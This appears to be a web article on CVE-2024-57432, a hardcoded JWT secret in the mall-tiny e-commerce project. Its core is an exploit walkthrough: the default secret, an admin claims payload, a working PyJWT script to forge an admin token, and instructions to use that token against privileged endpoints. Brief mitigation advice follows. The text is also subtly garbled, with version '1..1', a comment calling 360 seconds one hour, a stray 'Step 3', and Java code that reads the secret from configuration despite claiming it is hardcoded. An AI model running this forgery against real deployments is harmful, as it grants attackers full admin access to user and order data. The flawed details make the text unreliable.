CVE-2024-57432 - Exploiting Insecure Permissions in macrozheng mall-tiny 1..1 with Hardcoded JWT Secrets (Exclusive Guide)

The macrozheng mall-tiny project (version 1..1) is a lightweight e-commerce platform widely used for learning and small business solutions. However, a severe vulnerability—CVE-2024-57432—has been discovered, related to insecure permissions due to hardcoded JWT signing keys. In this exclusive read, we'll break down the flaw, demonstrate how attackers can exploit it, and provide key references and code snippets to showcase the simplicity and impact of the issue.

What Is The Vulnerability (CVE-2024-57432)?

In mall-tiny 1..1, JWT secrets are hardcoded in the source code and do not change across installations. Because the JWT payload includes sensitive user information and is directly used for access control, this design flaw makes the entire authentication system vulnerable. Anyone with access to the code (the project is open-source!) can generate valid JWT tokens for any user, including privileged accounts.

User information embedded in JWT payload

- JWT value determines user privileges (authentication/authorization)

Location in Code

Here's the snippet from mall-security/src/main/java/com/macro/mall/security/config/SecurityConfig.java:

public class SecurityConfig extends WebSecurityConfigurerAdapter {
    @Value("${jwt.token.secret}")
    private String secret;

    // Other code...

    // Example configuration in application.yml
    // jwt:
    //   token:
    //     secret: malltiny-secret
}

In practice, the secret stays "malltiny-secret" by default and is never randomized or unique per deployment.

Payload Example

{
  "userId": 1,
  "username": "admin",
  "exp": 1749999999
}

The JWT is then signed using the static secret. Each privilege check trusts the JWT's content directly to grant or deny access to endpoints.

How To Forge The JWT (Exploit Details)

If you know the secret, you can generate admin tokens at will. Let's walk through forging a JWT for the admin user.

First, assemble desired claims (change userId and username as needed)

{
  "userId": 1,
  "username": "admin",
  "exp": 1749999999
}

Use Python and PyJWT

import jwt
import time

secret = "malltiny-secret"  # Hardcoded in source
payload = {
    "userId": 1,             # Admin user ID
    "username": "admin",     # Admin user
    "exp": int(time.time()) + 360  # 1 hour from now
}

# Create JWT
token = jwt.encode(payload, secret, algorithm='HS256')
print(token)

Step 3: Use the Token

Now, just send requests with Authorization: Bearer <your_token> to any privileged endpoint. The server will accept your forged token, granting full admin access.

Authentication bypass: No need to guess passwords—JWTs can be forged.

- System compromise: Full access to user and order data, business logic, and potentially remote code execution via admin features.

Mitigation

- PROPER: NEVER hardcode secrets in code or configs that get shipped/published.

Ensure each deployment has unique secrets.

- Limit info in JWT payloads and re-check user roles/privileges on server-side using database lookups.

References

1. macrozheng/mall-tiny GitHub
2. Official CVE entry (NVD)
3. JWT Best Practices
4. PyJWT Docs

Conclusion

CVE-2024-57432 is a textbook example of why secrets must never be hardcoded. In mall-tiny 1..1, with just the published code, attackers can grant themselves any user permissions—including admin—by forging JWTs. Protect your apps and users by following security best practices!


*Stay secure, and test your apps for similar vulnerabilities before attackers do!*

Timeline

Published on: 01/31/2025 17:15:15 UTC
Last modified on: 03/13/2025 14:15:34 UTC